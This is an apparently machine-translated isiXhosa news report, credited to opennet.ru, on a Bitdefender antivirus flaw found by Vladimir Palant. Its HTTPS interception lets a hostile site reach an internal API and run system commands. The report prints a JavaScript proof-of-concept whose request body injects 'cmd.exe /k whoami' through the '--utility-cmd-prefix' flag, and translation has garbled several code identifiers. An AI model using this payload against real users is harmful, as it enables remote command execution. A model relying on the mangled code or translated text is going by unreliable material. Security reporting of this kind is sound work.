UVladimir Palant, umdali we-Adblock Plus,
Unobangela wengxaki kukuba i-antivirus ye-Bitdefender yenza uthintelo lwasekhaya lwetrafikhi ye-HTTPS ngokutshintsha isiqinisekiso se-TLS sokuqala sendawo. Isatifikethi esongezelelweyo sengcambu sifakwe kwisistim somthengi, okwenza kube lula ukufihla ukusebenza kwenkqubo yokuhlola i-traffic esetyenziswayo. I-antivirus izifaka kwitrafikhi ekhuselweyo kwaye ifake ikhowudi yayo yeJavaScript kwamanye amaphepha ukuphumeza umsebenzi woPhendlo oluKhuselekileyo, kwaye kwimeko yeengxaki zesatifikethi soqhagamshelwano olukhuselekileyo, ithatha indawo yephepha lemposiso elibuyisiweyo ngelayo. Ekubeni iphepha elitsha lempazamo linikezelwa egameni lomncedisi ovulwayo, amanye amaphepha kuloo mncedisi anofikelelo olupheleleyo kumxholo ofakwe yi-Bitdefender.
Xa uvula indawo elawulwa ngumhlaseli, eso siza sinokuthumela i-XMLHttpRequest kwaye sibonise iingxaki ngesatifikethi se-HTTPS xa uphendula, okuya kukhokelela ekubuyiselweni kwephepha lephutha elichithwa yi-Bitdefender. Ekubeni iphepha lempazamo livulwe kumxholo wesizinda somhlaseli, unokufunda imixholo yephepha le-spoofed kunye ne-Bitdefender parameters. Iphepha elinikezwe yiBitdefender likwaqulethe isitshixo seseshoni esikuvumela ukuba usebenzise iBitdefender API yangaphakathi ukuphehlelela iseshoni yesikhangeli se-Safepay eyahlukileyo, ichaza iiflegi zomgca womyalelo ongenasizathu, kwaye uqalise nayiphi na imiyalelo yenkqubo usebenzisa “--utility-cmd-prefix” iflegi. Umzekelo wokuxhaphaza (iparam1 kunye neparam2 ngamaxabiso afunyenwe kwiphepha lempazamo):
var isicelo = entsha XMLHttpRequest ();
request.open("POST", Math.random());
request.setRequestHeader("Uhlobo-lomxholo", "isicelo/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Masikhumbule ukuba uphando olwenziwe ngo-2017
Ziimveliso ezili-11 kuphela kwezingama-26 ezibonelele ngee-suite ze-cipher zangoku. Iinkqubo ze-5 azizange ziqinisekise izatifikethi (i-Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). I-Kaspersky Internet Security kunye neemveliso zoKhuseleko zizonke zaziphantsi kokuhlaselwa
umthombo: opennet.ru